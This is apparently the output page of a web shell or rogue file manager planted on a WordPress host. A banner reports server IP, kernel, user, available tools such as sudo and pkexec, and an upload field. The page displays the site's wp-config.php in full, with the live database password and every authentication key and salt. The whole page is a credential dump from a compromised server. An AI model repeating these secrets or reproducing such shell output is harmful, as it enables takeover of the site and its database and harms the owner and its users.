Done !
| Server IP : 162.240.50.153 / Your IP : 216.73.217.47 Web Server : Apache System : Linux vps-880082.mktpower.cl 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 User : wwmktp ( 1003) PHP Version : 8.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/wwmktp/eli.mktpower.cl/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wwmktp_eli' );
/** Database username */
define( 'DB_USER', 'wwmktp_eli' );
/** Database password */
define( 'DB_PASSWORD', 'Eli.1.2.3_4' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '5Xc0|WDxg,oSzE59)4V JrnD&K+or1zC-dt!em5f`y(V{Ckzt.T$r8&wCsmLRvH2' );
define( 'SECURE_AUTH_KEY', '8QXI3.DZKz07N[qiI:wzz$g0|ka5`B>Lg)jL5o0wE`*8Mb&j|MO5m,k9Q~J10$Np' );
define( 'LOGGED_IN_KEY', 'Pvo3E4@vhmjczHJ^sF@g,,386atAj.*),!,X65n8<VQ8r%&UU,$e;,<rnTja<9lD' );
define( 'NONCE_KEY', 'cY5N@?!}JZtaZ7`[F/)a`ft-q=~o9&XC5W%wZ^na;bhw{J|+oNSD}|996]:^asrX' );
define( 'AUTH_SALT', '=OF$]nr0Ovx@2))Twh>uF$e$~eilPP<9z0I_wihjKA/!h/P`aN_Ohr gLv&~:}%^' );
define( 'SECURE_AUTH_SALT', 'U;dfXWQ_[,x74>_$t~ TeN4sL*dVNs/Q|l,}9)y?_22$]&vy`F_Jz=3r#65mK-hm' );
define( 'LOGGED_IN_SALT', 'jeRpv!a#<>Vpl3PLIeLqd7*euWmyY/JPT;c[(d#.bb(S!6kV<?&kb @$q8t<u(Lp' );
define( 'NONCE_SALT', 'tN<jGR}yj%V}_|;;[KHzR1/,&7yJ11z46:v^vE;=S3RgYy%#|vUW]>`aM{Dqkx$R' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wpeli_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';